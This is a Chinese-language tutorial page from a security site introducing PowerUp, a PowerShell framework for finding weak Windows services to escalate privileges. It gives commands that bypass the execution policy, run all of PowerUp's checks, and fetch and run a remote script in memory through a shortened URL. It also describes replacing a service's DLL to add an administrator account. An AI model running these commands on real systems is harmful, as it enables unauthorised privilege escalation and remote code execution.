Powrshell Powerup 提权框架

  • A+
所属分类:网络安全工具
阿里


推广者专属福利,新客户无门槛领取总价值高达2775元代金券,每种代金券限量500张,先到先得。

通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windows服务提权,比如我们替换掉服务所依赖的DLL文件,当服务重启时,加载我们替换的DLL文件从而完成比如添加管理员账号的操作。或者通过常见的Mssql,Mysql等服务,通过其继承的系统权限来完成提权等等,而今天我将介绍一个非常实用的Powershell框架-Powerup,此框架可以在内核提权行不通的时候,帮助我们寻找服务器脆弱点进而通过脆弱点实现提权的目的。
要使用Powerup,首先需要下载此脚本:Powerup,之后加载此脚本:

E:> powershell.exe -nop -exec bypass

PS E:\> Import-Module .\PowerUp.psm1

加载完成以后,便可以使用Powerup中的所有模块了。

通过如下命令可以查看所有模块:

Powrshell Powerup 提权框架

PS E:\> Get-Command -Module powerup

输入可以通过tab键来自动补全,如果要查看各个模块的详细说明,可以使用"Get-help [cmdlet] -full"来查看,比如"Get-Help Find-DLLHijack -full",如果要将输出的结果导出到一个文件可以使用Out-File,如下:

PS E:\> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

上述命令使用了Invoke-AllChecks,脚本将会进行所有的检查

在cmd环境下,可以使用下列方式来运行该脚本:

E:\> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1;

Invoke-AllChecks}"

如果你想在内存加载此脚本,可以用下列方式:

E:\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).

DownloadString('http://dwz.cn/2vkbfP'); Invoke-AllChecks"

除此之外,Metasploit上同样包含执行powershell脚本的模块exec_powershell.rb,通过此模块,可以通过msf会话来执行powershell。

CE安全网

发表评论

您必须登录才能发表评论!